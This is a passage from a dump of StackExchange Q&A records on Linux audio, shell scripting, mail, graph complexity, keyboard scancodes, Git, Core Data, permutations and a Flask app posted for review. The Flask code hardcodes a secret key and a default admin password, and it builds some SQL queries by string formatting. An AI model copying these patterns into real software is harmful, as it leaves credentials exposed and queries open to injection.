instructions:http://www.yolinux.com/TUTORIALS/LinuxTutorialAdvanced_vi.htmlhttp://www.vim.org/git.phpI still have this error. What should I do?In my memory I once have accidentally deleted /usr/local/bin...not sure if that affects... | How do I clean up vi and reinstall it completely? | python;vi | null |
_unix.388317 | I have a laptop, which has an integrated Intel sound card with an HDMI connection in addition to internal speakers and a headphone jack. It used to run Debian 7, but now I'm replacing it with clean-slate Debian 9.The laptop is connected to the TV via HDMI. External speakers are plugged into the headphone jack. As a rule, the sound should play through both connections, but I ideally I'd like to control it on a per-application basis. (The laptop mainly runs Kodi, which in principle should use both outputs, whereas MPD should only use the headphone jack so that it can play even when the TV is off.)I managed to do it in Debian 7 by applying random tips from the Internet; it was rather fragile, and I will not be able to reproduce it. I would like to do it the right way with, I guess, PulseAudio as the tool.Here's the output of pacmd info on a freshly installed system, which I presume is the result of automatic detection by module-udev-detect. HDMI and speakers are now split into two different profiles. If I choose one, the corresponding output works just fine on its own. Now I need to be able to use them simultaneously. A number of solutions on the Internet suggest modifying default.pa and using module-combine-sink. In that case, should I skip using module-udev-detect altogether and set up sinks, ports, etc. manually? Or I can built on top what is being detected? I am confused as to how a manually added sink in default.pa would interact with the autodetected stuff. Ideally, I would like to have just three sinks and no redundant profiles that I am not going to use. | PulseAudio: to output to headphones & HDMI simultaneously, do I need to skip `module-udev-detect` and set it all up manually? | debian;audio;pulseaudio | null |
_unix.210963 | It must be soooo simple, but all of the examples that I found after a few hours of googling don't work, as the mail is always attached to the file instead of writing it into the body. I don't want to send empty messages either, but want to send mail only when I have output from the script. Here is my command:$script_file > /tmp/output.log ; mail -E -s Output subject my@emailaddress < /tmp/output.log ; rm -f /tmp/output.logWould it be possible to change this command to force the mail to embed the content of the output.log file?My system is CentOS.Many thanks! | How to embed file content into body of the email using mail command? | email | I use mutt to do that, like this. Be aware of argument order, do not place recipient after -amutt [email protected] -s Mail subject -a /file/to/attach < /file/with/mail/body |
_cstheory.20179 | Petersen's theorem states that a bridgeless cubic graph contains a perfect matching (1-factor). Motivated by this question, Complexity of finding 2 vertex-disjoint (|V|/2)-cycles in cubic graphs? I am interested in the problem of deciding the existence of perfect matching $M$ such that removing the edges of $M$ leaves two node-disjoint cycles of equal cardinality (each cycle has size $|V|/2$).Is this problem solvable in P-time? Is it $NP$-complete?The input is connected bridgeless cubic graph. | Finding balanced disjoint cycles in bridgeless cubic graphs | cc.complexity theory;graph theory | This is NP-complete; reduction from the question, Does a 2-edge-connected cubic graph $H$ contain a Hamiltonian cycle avoiding a given edge $e$?Construct $G$ as follows. Take two copies of $H-e$, denoting the endpoints of $e$ in the first copy $v_1$, $u_1$ and denoting the endpoints of $e$ in the second copy $v_2$, $u_2$. Add edges $e_v$ between $v_1$ and $v_2$, and $e_u$ between $u_1$ and $u_2$. Observe that $G$ is 2-edge-connected.Any cycle of $G$ contains both or neither of $e_v$ and $e_u$, since these edges form an edge cut. Thus if $G$ has two vertex-disjoint cycles of length $|V(H)|$, they must each lie in a separate copy of $H$. Such cycles exist precisely if $H$ contains a Hamiltonian cycle avoiding $e$.Edit: Am I missing something obvious, or is the question of finding a good perfect matching clearly equivalent to finding the two long cycles? |
_unix.234523 | Since both ksh and bash are based upon sh many Korn Shell scripts (ksh) will simply run as Bourne-again Shell scripts (bash) once the shebang and file extension are changed, and you call $ bash script.bash instead of $ ksh script.ksh.I have a basic script to replace any occurrence of ksh in a directory called files and changes file extensions for the scripts.#!/bin/bash/#replace instancesfind ./files -type f - exec sed -i.bak s/ksh/bash/g {} \;#Change extensionsfor f in ./files/*.ksh; do mv $f ./files/$(basename $f .ksh).bashdone#Clean uprm ./files/*.bakThis script works and does what is described above, but is it sufficient for converting any ksh script to bash, or are there conditions which I have not accounted for? | Script to convert a directory of ksh scripts to bash scripts? | bash;shell script;ksh;conversion | null |
_unix.223750 | I have a folder with three files:$ lsa b cIf I pipe the output of ls to wc, I get the right result:$ ls | wc -l3However, when I specify the input to wc as the output of ls, I get extra text:$ wc -l <(ls)3 /dev/fd/63Can anyone explain to me what is happening? | Extra output on input redirection | pipe;io redirection;input | wc will tell you what file it's working on if it's able. With the first one with the pipe it's reading from stdin, not a file, so does not report a filename. The second one, however, you're using process substitution which presents the output of the command as a file, which wc reports. It reports on the file descriptor it was given from which to read. |
_cs.13414 | In other words, can a programming language be referentially transparent even if not everything is an expression?And can you say that if in a programming language, everything is an expression, then it is referentially transparent? | Do expressions have much to do with referential transparency? | programming languages | null |
_unix.328992 | I'm using Debian Jessie with LXDE on a recent notepad. The command showkey -s prints 0xe0 0x4c 0xe0 0xcc when Fn+F2 is pressed. But dmesg tells me: atkbd serio0: Unknown key released (translated set 2, code 0xab on isa0060/serio0). atkbd serio0: Use 'setkeycodes e02b <keycode>' to make it known.Two questions:1. Where the scancode e02b comes from?2. Why the command setkeycodes e02b 44 works but not setkeycodes e04c 44?I also noticed that when I press Fn+F2, evtest prints 'ab': Event: time 1481025600.385595, type 4 (EV_MSC), code 4 (MSC_SCAN), value ab Event: time 1481025600.385595, -------------- EV_SYN ------------value 1 Event: time 1481025600.394373, type 4 (EV_MSC), code 4 (MSC_SCAN), value ab Event: time 1481025600.394373, -------------- EV_SYN ------------ The command setkeycodes ab 44 works too. Can someone help me understanding what's wrong?Thank you all.EDIT:Both Fn+F2 and Fn+F3 have the same scancode (0xab) for evtest and dmesg, but showkey prints two different scancodes: 0xe0 0x4c 0xe0 0xcc for Fn+F2 0xe0 0x54 0xe0 0xd4 for Fn+F3I wonder where the scancode 0xab printed by evtest comes from. | The scancode shown by dmesg is different from that from showkey | linux;keyboard | null |
_softwareengineering.352434 | I'm looking for perspectives on how risk analysis is performed when there's not precisely a dollar value associated with the risk, as in an Open Source project. Traditionally, risk analysis takes the form ofAsset Value X Annual Probability of Loss X Probable Outcome of Loss = RiskOpen source community driven projects provide great value to people, and their development faces significant risks, both from a project standpoint (ranging from wasted developer cycles to failure to ever deliver) and from a product standpoint (users could not like the product, and update could make people leave or a security hole could leave millions of systems vulnerable to a nasty malware attack). Nevertheless, it doesn't quite lend itself to this formula.Who is responsible for identifying and managing these risks in Open Source community driven projects? How does the team decide which risks are most significant to the outcome of the project? Are there any official standards or approaches in this area?In the case of adopting Open Source, I believe this question has some solid answers:https://www.federalreserve.gov/boarddocs/srletters/2004/SR0417a1.pdfhttps://opensource.com/article/17/3/risks-open-source-project-managementOn the other hand, I don't see any literature or voices speaking to this aspect of the creation of such software. Any input from people actively involved in this community? | Risk Analysis in Open Source Community Driven Projects | open source;security;risk;risk assesment | null |
_unix.249363 | If i have a folder, Tools, so Ipwd> /c/Toolsin tools I have three folders (solution folders for Visual Studio but not important).I want a command like below1234@Computer mINGW64 ~/Tools$ ls --show-repositoriesnow Tools is NOT a repository folder. but /c/Tools/MyProject and /c/Tools/MyApp both are. So forgetting all the other formatting for ls (which i can handle on my own)the output I want is:drwxr-xr-x 1 0018121 Domain Users 0 Dec 14 14:33 MyProject/ (develop)drwxr-xr-x 1 0018121 Domain Users 0 Dec 14 14:17 Data/drwxr-xr-x 1 0018121 Domain Users 0 Dec 14 12:08 MyApp/ (master)-rw-r--r-- 1 0018121 Domain Users 399K Aug 4 10:41 readme.txt-rw-r--r-- 1 0018121 Domain Users 136K Aug 4 10:20 image.jpgso from the parent folder I can tell if a child folder is a current valid git repository (and what branch is currently checked out)ThanksJaeden Sifo Dyas al'Raec Ruiner | Git Bash - ls show repo folders | bash;git | null |
_codereview.164249 | I have a situation where I have to use protocol to be conformed by NSManagedObject which has relationships with other entities.My protocol is like:protocol Account { var accountId: String { get } var isValidAccount: Bool { get }}Here is that entity:class AccountMO: NSManagedObject { @NSManaged var uid: String! @NSManaged var anotherEntity: AnotherEntity? private (set) var storedMOC: NSManagedObjectContext! override var managedObjectContext: NSManagedObjectContext? { return storedMOC } override init(entity: NSEntityDescription, insertInto context: NSManagedObjectContext?) { super.init(entity: entity, insertInto: context) storedMOC = context! } init(moc:NSManagedObjectContext) { //I'm using this method to init AccountMO let mEntity = NSEntityDescription.entity(forEntityName: Account, in: moc) super.init(entity: mEntity!, insertInto: moc) } func addAnotherEntity() { //this method creates AnotherEntity //and this method will be called after particular event has happened }}Extension which is conforming protocol:extension AccountMO: Account { var accountId: String { return uid! } var isValidAccount: Bool { return anotherEntity != nil }}Whenever I want Account properties, I uses DB interface to fetch and return AccountMO as:class DBInterface { //initialization methods var mainThreadMOC: NSManagedObjectContext? func createNewAccount(uid: String) { //create and save account to database } func getAccount() -> Account { //this method abstracts database implementations from outside classes //in future if I wanted to replace core-data by another database, I've to change this method only let privMOC = privateMOC()//this is child of mainThreadMOC let accountMO = fetchAccountEntity(moc: privMOC) return accountMO as Account }}This works fine!But what I felt is storedMOC in AccountMO is something odd man out!If I don't store MOC in AccountMO object, then it crashes onreturn anotherEntity != nilthis line.Apparently this is caused because AccountMO looses it's managedObjectContext once returned from getAccount() method.So, to prevent AccountMO from losing it's managedObjectContext I've added that extra property to it. Please feel free to tear this implementation down if needed! | Core-data object with relationships conforming protocol in swift | swift;core data;protocols | null |
_unix.317247 | I would like to know how to display all clocks and their associated driver in Linux. It is possible to do it by looking at the device tree file but I was wondering if there is a sysfs entry that allows to print clock tree. Is it possible to know the frequency of each clock also ? Thank you for your help. | Display all declared clocks and their frequency | linux;clock | null |
_unix.73309 | I have a script which creates a lot of files and directories. The script does black box tests for a program which works with a lot of files and directories. The test count grew and the tests were taking too long (over 2 seconds). I thought I run the tests in a ram disk.I ran the test in /dev/shm. Strangely it did not run any faster. Average run time was about the same as on normal harddisk. I also tried in a fuse based ram disk written in perl. The website is gone but I found it in the internet archive. Average run time on the fuse ram disk is even slower. Perhaps because of the suboptimal implementation of the perl code.Here is a simplified version of my script:#! /bin/shpreparedir() { mkdir foo mkdir bar touch bar/file mkdir bar/baz echo qux > bar/baz/file}systemundertest() { # here is the black box program that i am testing # i do not know what it does exactly # but it must be reading the files # since it behaves differently based on them find $1 -type f -execdir cat '{}' \; > /dev/nullsingletest() { mkdir actual (cd actual; preparedir) systemundertest actual mkdir expected (cd expected; preparedir) diff -qr actual expected}manytests() { while read dirname; do rm -rf $dirname mkdir $dirname (cd $dirname; singletest) done}seq 100 | manytestsThe real script does a bit more error checking and result collecting and a summary. The find is a dummy for the actual program I am testing.I wonder why my filesystem intensive script does not run faster on a memory backed filesystem. Is it because the linux kernel handles the filesystem cache so efficiently that it practically is a memory backed filesystem? | why is filesystem intensive script not faster on ram disk | performance;ramdisk | Quite generally speaking, all operations happen in RAM first - file systems are cached. There are exceptions to this rule, but these rather special cases usually arise from quite specific requirements. Hence until you start hitting the cache flushing, you won't be able to tell the difference.Another thing is, that the performance depends a lot on the exact file system - some are targeting easier access to huge amounts of small files, some are efficient on real-time data transfers to and from big files (multimedia capturing/streaming), some emphasise data coherency and others can be designed to have small memory/code footprint.Back to your use case: in just one loop pass you spawn about 20 new processes, most of which just create one directory/file (note that () creates a sub-shell and find spawns cat for every single match) - the bottleneck indeed isn't the file system (and if your system uses ASLR and you don't have a good fast source of entropy your system's randomness pool gets depleted quite fast too). The same goes for FUSE written in Perl - it's not the right tool for the job. |
_vi.11854 | Trying to make it easier to comment out unused parameters in a function.Added the macro:map C wbywcw/*<C-v><Esc>pa*/<C-v><Esc>/[,)]<C-v><C-m>nbSo on hitting Cap-C it will comment out the current parameter under the cursor and move to the next parameter. Nice to get feedback on that as well.But what I really want to try and do is make it check to see if the current parameter is commented out. If it is then uncomment it otherwise comment it out.Break down of the current command:map C wbywcw/*<C-v><Esc>pa*/<C-v><Esc>/[,)]<C-v><C-m>nbwb go the beginning of the current word. Need to use w first becuase if we are currently at the beginning of the word a single b would go to the previous word.yw yank the parameter into the buffer.cw Change the parameter. Into /*p pull the yanked parameter so we now have /*parama append more text /*param*//[,)] Search for the closing ')' or the comma after this parametern Move to the comma after the next paramb Move back one word should be the next param | Comment out unused parameters | vimrc;vimscript | null |
_unix.177210 | I use Debian/PPC on an old Mac Mini G4, it currently serve as a DLNA server (UPnP), no mouse or keyboard plugged.I would like that my power button also serves to shutdown the box. Currently it does nothing, on recent x86 I would have used ACPI as described here.However ACPI does not seems to be available from my G4 box (see for example here or here), only pbbuttonsd is available, see link.I could not find whether or not any event (APM type?) is sent when pressing the power button. I know that I can hold the power button for 4s then the machine halt, but I would prefer a clean shutdown. As a last resort I could plug in a keyboard but I am looking for a solution without mouse or keyboard.How would one do that ?EDIT: Using web.archive.org I was able to read: http://web.archive.org/web/20110317165103/http://blog.blinker.net/2010/06/20/mac-mini-g4-homeserver-with-ubuntu-linux-10-04-wpa2/I used the solution suggested:I got this working on my G4 Quicksilver with Ubuntu by installing pbbuttonsd.I had to modify /etc/pbbuttonsd.conf and change this line:OnAC_KeyAction = noneto:OnAC_KeyAction = shutdownI ran /etc/init.d/pbbuttonsd restart to restart the daemon, and then the power button worked to trigger a clean shutdown.But this did not work for me, maybe there is a difference in between PowerBook and Mac Mini G4. | Configure power button to shutdown on Debian/Mac Mini G4 | shutdown;acpi;powerpc | After digging into the source code, I was able to suggest the following patch on the pbbuttons mailing list, as seen here.Turns out the code would only consider a power button press event in case:if (n == 6 && ((intr[1] >> 3) & 1) != PBpressed) {while the comment just above explains that:/* n = 2 && intr[1] = 0x0c = %01100 power button on mac-mini */so I simply changed it to:if (n == 2 && intr[1] == 0x0c ) {Now I can properly configure the OnAC_KeyAction to shutdown ! No need for a keyboard for a simple action like this now ! |
_unix.268174 | I have two files:File1.txt30 40 A T match1 string145 65 G R match2 string250 78 C Y match3 string3File2.txt match1 60 add1 50 add2match2 15 add1 60 add2match3 20 add1 45 add2and I want to obtain an output that looks like so:30 40 A T match1 string1 60 add145 65 G R match2 string2 15 add150 78 C Y match3 string3 20 add1I want to append column 2 and column 3 from file2.txt to the end of file1.txt if there is a match in column 5 from file1.txt. I've tried to use this join command:join -1 5 -2 1 -a 1 -o 1.1 -o 1.2 -o 1.3 -o 1.4 -o 1.5 -o 1.6 -o 2.2 -o 2.3 file1.txt fil2.txtHowever, this only seems to print the columns from the first file. Is there any other solutions other than join to tackle this problem? | Joining columns from files if they contain a match in another column | text processing;awk;join | I found a solution:awk -F \t 'FNR==NR {a[$1] = $2 \t $3;next} $5 in a{print $0 \t a[$5]}' file2.txt file1.txt > outing.txt |
_webmaster.76991 | I would like to buy a second-level domain name (e.g. example.com) and I willrun web server on my own machine (named www, having public IP address).Is this sufficient for my machine to be accessible by visitors via browserwith http://www.example.com?I expect that every visitor machine accessing http://www.example.com will first askit's DNS server if it knows the IP address of www.example.com.If it doesn't know. The DNS server will ask the root server on the address of .comtop-level domain. Then it will ask .com top-level domain if it knows the IP addressof www.example.com and it should be there because I bought it. So finally it will send the IP address to the visitor's DNS server and then visitor's DNS server will send the IPaddress to visitor's machine?I would like to avoid installing and configuring own DNS server (I have only one laptop). Is my expectation correct that I don't need to install own DNS server?If yes/no, please describe a little the reasoning behind the scene. | Is it necessary to run own DNS server? | dns;domains;dns servers | Your domain name registrar should be hosting your DNS records. This is not something you have to do or worry too much about. In fact, you are far better off not running a DNS server because of the security implications. When you register your domain name many registrars will host your DNS records free of charge. Some do charge a small fee. If your registrar for some extremely odd reason cannot host your DNS records, there are DNS hosts. So there are plenty of options. I suggest making this a question you ask the registrar prior to registering your domain name. |
_codereview.32502 | I just started with Python a month ago, and with Flask this week. This is my first project.I am curious about general style, proper use of Python idioms, and Flask best-practices.run.py:#!/usr/bin/env python# -*- coding: utf-8 -*-import loggingimport osimport sqlite3import StringIOimport timefrom ConfigParser import SafeConfigParserfrom emailvision.restclient import RESTClientfrom flask import Flask, request, g, render_template, flash, send_file, \ redirectfrom mom import MOMClientfrom zlib import compress, decompressapp = Flask(__name__)app.config.update(dict( DATABASE='/tmp/nhs-listpull.db', DEBUG=True, SECRET_KEY='\xeb\x12A;\x8b\x0c$\xf4>O\xb6\x9c\x15y=>\x0cU<Kzp>\xe9', USERNAME='admin', PASSWORD='default'))app.config.from_envvar('NHS-LISTPULL_SETTINGS', silent=True)def connect_db(): Connects to the specific database. rv = sqlite3.connect(app.config['DATABASE']) rv.row_factory = sqlite3.Row return rvdef init_db(): Creates the database tables. app.logger.info(Initializing database) with app.app_context(): db = get_db() with app.open_resource('schema.sql', mode='r') as f: sql = f.read() app.logger.debug(sql) db.cursor().executescript(sql) db.commit()def get_db(): Opens a new database connection if there is none yet for the current application context. if not hasattr(g, 'sqlite_db'): g.sqlite_db = connect_db() return g.sqlite_dbdef get_mom(): Opens a new MOM db connection if there is none yet for the current application context. if not hasattr(g, 'mom'): config_ini = os.path.join(os.path.dirname(__file__), 'config.ini') config = SafeConfigParser() config.read(config_ini) mom_host = config.get(momdb, host) mom_user = config.get(momdb, user) mom_password = config.get(momdb, password) mom_database = config.get(momdb, db) g.mom = MOMClient(mom_host, mom_user, mom_password, mom_database) return g.momdef get_ev_client(): Gets an instance of the EmailVision REST client. if not hasattr(g, 'ev'): config_ini = os.path.join(os.path.dirname(__file__), 'config.ini') config = SafeConfigParser() config.read(config_ini) ev_url = config.get(emailvision, url) ev_login = config.get(emailvision, login) ev_password = config.get(emailvision, password) ev_key = config.get(emailvision, key) g.ev = RESTClient(ev_url, ev_login, ev_password, ev_key) return [email protected]_appcontextdef close_db(error): Closes the database again at the end of the request. if error is not None: app.logger.error(error) if hasattr(g, 'sqlite_db'): g.sqlite_db.close()def query_db(query, args=(), one=False): cur = get_db().execute(query, args) rv = cur.fetchall() cur.close() return (rv[0] if rv else None) if one else [email protected]('/')def show_jobs(): app.logger.debug(show_jobs()) db = get_db() sql = ''' select j.id, j.record_count, j.ev_job_id, j.created_at, j.csv, t.name, case when j.status = 0 then 'Pending' when j.status = 1 then 'Complete' end status from job_status j inner join list_types t on (j.list_type_id = t.id) order by j.id desc''' cur = db.execute(sql) jobs = cur.fetchall() app.logger.debug(Found {} jobs.format(len(jobs))) return render_template('job_status.html', jobs=jobs)@app.route('/list', methods=['POST'])def create_list(): # curl --data list_type_id=1 http://localhost:5000/list app.logger.debug(create_list()) list_type_id = request.form['list_type_id'] app.logger.debug(list_type_id= + list_type_id) mom = get_mom() app.logger.debug(mom.get_customers()) csv, count = mom.get_customers() app.logger.debug(CSV is {} bytes.format(len(csv))) csv = buffer(compress(csv)) app.logger.debug(Compressed CSV is {} bytes.format(len(csv))) db = get_db() db.execute(('insert into job_status ' '(list_type_id, record_count, status, csv) VALUES (?,?,?,?)'), (list_type_id, count, 0, csv)) db.commit() flash('List successfully generated with {:,} records'.format(count)) return redirect('/')@app.route('/list-noas', methods=['POST'])def create_list_no_autoship(): app.logger.debug(create_list_no_autoship()) list_type_id = request.form['list_type_id'] app.logger.debug(list_type_id= + list_type_id) mom = get_mom() app.logger.debug(mom.get_customers_excl_autoship()) csv, count = mom.get_customers_excl_autoship() app.logger.debug(CSV is {} bytes.format(len(csv))) csv = buffer(compress(csv)) app.logger.debug(Compressed CSV is {} bytes.format(len(csv))) db = get_db() db.execute(('insert into job_status ' '(list_type_id, record_count, status, csv) VALUES (?,?,?,?)'), (list_type_id, count, 0, csv)) db.commit() flash('List successfully generated with {:,} records'.format(count)) return redirect('/')@app.route('/list-reengagement', methods=['POST'])def create_list_reengagement(): app.logger.debug(create_list_reengagement()) list_type_id = request.form['list_type_id'] app.logger.debug(list_type_id= + list_type_id) mom = get_mom() app.logger.debug(mom.get_customers_reengagement()) csv, count = mom.get_customers_reengagement() app.logger.debug(CSV is {} bytes.format(len(csv))) csv = buffer(compress(csv)) app.logger.debug(Compressed CSV is {} bytes.format(len(csv))) db = get_db() db.execute(('insert into job_status ' '(list_type_id, record_count, status, csv) VALUES (?,?,?,?)'), (list_type_id, count, 0, csv)) db.commit() flash('List successfully generated with {:,} records'.format(count)) return redirect('/')@app.route('/csv/<int:job_id>', methods=['GET'])def get_csv(job_id): db = get_db() cur = db.execute('select csv from job_status where id = {}'.format(job_id)) csv = cur.fetchone()[0] csv = decompress(csv) sio = StringIO.StringIO() sio.write(csv) sio.seek(0) return send_file(sio, attachment_filename= {}_{}.txt.format(job_id, time.strftime(%Y%m%d%H%M%S)), as_attachment=True)@app.route('/send/<int:job_id>', methods=['GET'])def send_to_emailvision(job_id): Sends raw CSV to EmailVision db = get_db() cur = db.execute('select csv from job_status where id = {}'.format(job_id)) csv = cur.fetchone()[0] logging.info(Got {} bytes of compressed CSV.format(len(csv))) csv = decompress(csv) logging.info(Sending {} bytes of raw CSV to EmailVision.format(len(csv))) ev_job_id = get_ev_client().insert_upload(csv) if ev_job_id > 0: db.execute('update job_status set ev_job_id = ?, status=1 ' 'where id = ?', (ev_job_id, job_id)) db.commit() flash(List successfully sent to EmailVision (Job ID {})..format( ev_job_id)) else: flash(Something went horribly wrong., error) return redirect('/')@app.route('/delete/<int:job_id>', methods=['GET'])def delete_job(job_id): Delete a job try: db = get_db() db.execute('delete from job_status where id = {}'.format(job_id)) db.commit() flash(Job {} successfully deleted.format(job_id)) except Exception as e: flash(Something went horribly wrong. {}.format(e), error) return redirect('/')@app.route('/list-as', methods=['POST'])def create_list_autoships(): app.logger.debug(create_list_autoships()) list_type_id = request.form['list_type_id'] app.logger.debug(list_type_id= + list_type_id) app.logger.debug(mom.get_autoships()) csv, count = get_mom().get_autoships() app.logger.debug(CSV is {} bytes.format(len(csv))) csv = buffer(compress(csv)) app.logger.debug(Compressed CSV is {} bytes.format(len(csv))) db = get_db() db.execute(('insert into job_status ' '(list_type_id, record_count, status, csv) VALUES (?,?,?,?)'), (list_type_id, count, 0, csv)) db.commit() flash('List successfully generated with {:,} records'.format(count)) return redirect('/')@app.route('/list-cat-x-sell', methods=['POST'])def create_list_cat_x_sell(): app.logger.debug(create_list_cat_x_sell()) list_type_id = request.form['list_type_id'] category_list = request.form.getlist('category-list') product_list = request.form.getlist('product-list') app.logger.debug(list_type_id= + list_type_id) app.logger.debug(category_list= + ','.join(category_list)) app.logger.debug(product_list= + ','.join(product_list)) app.logger.debug(mom.get_cat_x_sell()) csv, count = get_mom().get_cat_x_sell() app.logger.debug(CSV is {} bytes.format(len(csv))) csv = buffer(compress(csv)) app.logger.debug(Compressed CSV is {} bytes.format(len(csv))) db = get_db() db.execute(('insert into job_status ' '(list_type_id, record_count, status, csv) VALUES (?,?,?,?)'), (list_type_id, count, 0, csv)) db.commit() flash('List successfully generated with {:,} records'.format(count)) return redirect('/')@app.errorhandler(404)def page_not_found(e): return render_template('404.html', e=e), [email protected](500)def internal_error(e): return render_template('500.html', e=e), 500if __name__ == '__main__': app.logger.debug(__name__) #init_db() FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' logging.basicConfig(filename='nhs-listpull.log', level=logging.DEBUG, format=FORMAT) app.run() | Providing a daily feed of current segmented customer data for targeted email campaigns | python;flask | null |
_codereview.79519 | I wrote the following code to permute the characters of a string assuming there is no repeated character. I also want to make sure the space complexity of this algorithm is \$O(n*n!)\$: There are \$n!\$ recursive calls, for each of these calls, I copy a string of size \$n\$. Am I right?Time complexity: \$O(n!)\$: \$n!\$ recursive callsIs it possible to make it more efficient? public static void permute(String str, String prefix){ if (str.length() == 0) System.out.println(prefix); for (int i = 0; i < str.length(); i++){ String c = Character.toString(str.charAt(i)); String rest = str.substring(0, i) + str.substring(i+1); permute(rest, prefix + c); } } | Permutations of a string | java;algorithm;strings;combinatorics | The number of permutations of n choose n items is always going to be n!. The way to optimize the solution is to prune the permutations to those that might solve the problem. This requires domain knowledge.For example if the problem involves ordinary English words all permutations matching *qz* or *mA* can be eliminated.Incidentally, \$O(n*n!)\$ can be shortened to \$O(n!)\$ since it is roughly \$O((n+1)!)\$ |
_webmaster.31082 | In Google Analytics, there is extensive information on the mobile device, version and browser version. However, this doesn't seem to go beyond the mobile browser.I would like to determine which application is responsible for visits to my site. Specifically, I want to know how many visits are coming from zite. http://www.handsetdetection.com/properties/vendormodel/Apple/iPad/page:4seems to indicate this information is probably available, where/does Google Analytics expose this? | Google Analytics: How can I traffic and referrals from iPad applications? | google analytics;mobile | You can track mobile devices with GA, but not the apps generating the traffic.If you're thinking along the lines of browser headers it may be possible but not with GA.For that you'd have to create an independent redirection which stores the browser header in a database, and if you're trying to measure a paid link, you can tell them to use the redirect link instead of the original. Otherwise GA collates the browser headers and doesn't offer much in detail. |
_webmaster.72832 | Besides not conforming to modern web standards and not being responsive/mobile friendly, are there any SEO penalties associated with using, say a tabular website? For example, if the architecture was one giant table containing the site content in columns and rows. | SEO implications of outdated website architecture | seo;google ranking | null |
_cs.10612 | Suppose we're receiving numbers in a stream. After each number is received, a weighted sum of the last $N$ numbers needs to be calculated, where the weights are always the same, but arbitrary. How efficiently can this done if we are allowed to keep a data structure to help with the computation? Can we do any better than $\Theta(N)$, i.e. recomputing the sum each time a number is received?For example:Suppose the weights are $W= \langle w_1, w_2, w_3, w_4\rangle$. At one point we have the list of last $N$ numbers $L_1= \langle a, b, c, d \rangle>$, and the weighted sum $S_1=w_1*a+w_2*b+w_3*c+w_4*d$. When another number, $e$, is received, we update the list to get $L_2= \langle b,c,d,e\rangle$ and we need to compute $S_2=w_1*b+w_2*c+w_3*d+w_4*e$.Consideration using FFTA special case of this problem appears to be solvable efficiently by employing the Fast Fourier Transform. Here, we compute the weighed sums $S$ in multiples of $N$. In other words, we receive $N$ numbers and only then can we compute the corresponding $N$ weighed sums. To do this, we need $N-1$ past numbers (for which sums have already been computed), and $N$ new numbers, in total $2N-1$ numbers. If this vector of input numbers and the weight vector $W$ define the coefficients of the polynomials $P(x)$ and $Q(x)$, with coefficients in $Q$ reversed, we see that the product $P(x)\times Q(x)$ is a polynomial whose coefficients in front of $x^{N-1}$ up to $x^{2N-2}$ are exactly the weighted sums we seek. These can be computed using FFT in $\Theta(N*\log (N))$ time, which gives us an average of $(\log (N))$ time per input number.This is however not a solution the the problem as stated, because it is required that the weighted sum is computed efficiently each time a new number is received - we cannot delay the computation. | Weighted sum of last N numbers | algorithms;data structures;online algorithms | Here is an elaboration of your approach. Every $m$ iterations, we use the FFT algorithm to compute $m$ values of the convolution in time $O(n\log n)$, assuming that the subsequent $m$ values are zero. In other words, we are computing$$\sum_{i=0}^{n-1} w_i a_{t-i+k}, \quad 0 \leq k \leq m-1,$$where $w_i$ are the $n$ weights (or the reverse weights), $a_i$ is the input sequence, $t$ is the current time, and $a_{t'} = 0$ for $t' > t$.For each of the following $m$ iterations, we are able to calculate the required convolution in time $O(m)$ (the $i$th iteration needs time $O(i)$). So the amortized time is $O(m) + O(n\log n/m)$. This is minimized by choosing $m = \sqrt{n\log n}$, which gives an amortized running time of $O(\sqrt{n\log n})$.We can improve this to worst-case running time of $O(\sqrt{n\log n})$ by breaking the computation into parts. Fix $m$, and define$$ b_{T,p,o} = \sum_{i=0}^{m-1} w_{pm+i} a_{Tm-i+o}, \quad C_{T,p} = b_{T,p,0}, \ldots, b_{T,p,m-1}. $$Each $C_{T,p}$ depends only on $2m$ inputs, so it can be computed in time $O(m\log m)$. Also, given $C_{\lfloor t/m \rfloor-p,p}$ for $0 \leq p \leq n/m-1$, we can compute the convolution in time $O(n/m + m)$. The plan therefore is to maintain the list$$ C_{\lfloor t/m \rfloor-p,p}, \quad 0 \leq p \leq n/m-1. $$For each period of $m$ inputs, we need to update $n/m$ of these. Each update takes time $O(m\log m)$, so if we spread these updates evenly, each input will take up work $O((n/m^2) m\log m) = O((n/m) \log m)$. Together with computing the convolution itself, the time complexity per input is $O((n/m)\log m + m)$. Choosing $m = \sqrt{n\log n}$ as before, this gives $O(\sqrt{n\log n})$. |
_unix.106345 | Will I be able to login into the system if the root filesystem is 100% full?Configuration: home is not a partition but is also placed on the root (i.e. /home is a directory on the partition holding root /), var and tmp are separate partitions and in good state. | Login when root filesystem is full | login;home;root filesystem | You should be able to log in as root, because usually a percentage of the partition's size is reserved in order to always enable root login for rescue operations and such. See this U&L Q&A:Reserved space for root on a filesystem - why?What you won't be able to do, however, is log in as a regular user from your display manager then switch to root or use sudo from a shell in a terminal.You have two alternatives instead:Switch to a VT (press Ctrl + Alt + F2, for example), log in as root from there and free some space.At boot time opt for single user mode to get a root shell that would also help you free some space for your regular login.This assumes that the reason your partition was filled up is due to regular user activity and not activity by root processes. In such cases, you might need to resort to mounting the partition on a Live system and freeing up the space from there. Thanks to Alexios' comment for bringing this up. |
_softwareengineering.214970 | I've got a database where I want to store user information and user_meta information.The reason behind setting it up in this way was because the user_meta side may change over time and I would like to do this without disrupting the master user table.If possible, I would like some advice on how to best set up this meta data table.I can either set it as below:+----+---------+----------+--------------------+| id | user_id | key | value |+----+---------+----------+--------------------+| 1 | 1 | email | [email protected] || 2 | 1 | name | user name || 3 | 1 | address | test address |...Or, I can set it as below:+----+---------+--------------------+--------------------+--------------+| id | user_id | email | name | address |+----+---------+--------------------+--------------------+--------------+| 1 | 1 | [email protected] | user name | test address |Obviously, the top verison is more flexible, but the bottom version is space saving and perhaps more efficient, returning all the data as a single record.Which is the best way to go about this?Or, am I going about this completely wrong and there's another way I've not thought of? | Best Way to Handle Meta Information in a SQL Database | database design | null |
_unix.358850 | There are 2 main ways that I know of so far:Explicitly: wrapping parentheses around a list of commandsImplicitly: every command in a pipelineAre there more ways, either explicitly or implicitly, in which one creates subshells in bash? | What are all the ways to create a subshell in bash? | bash;subshell | null |
_softwareengineering.301520 | I have discovered that reducing the arity of functions in my code to zero or one improves their non-functional characteristics significantly, such as testability, maintainability and their composability.This must have been identified elsewhere - does this approach have a name? | Reducing the arity of functions | programming practices;functions | null |
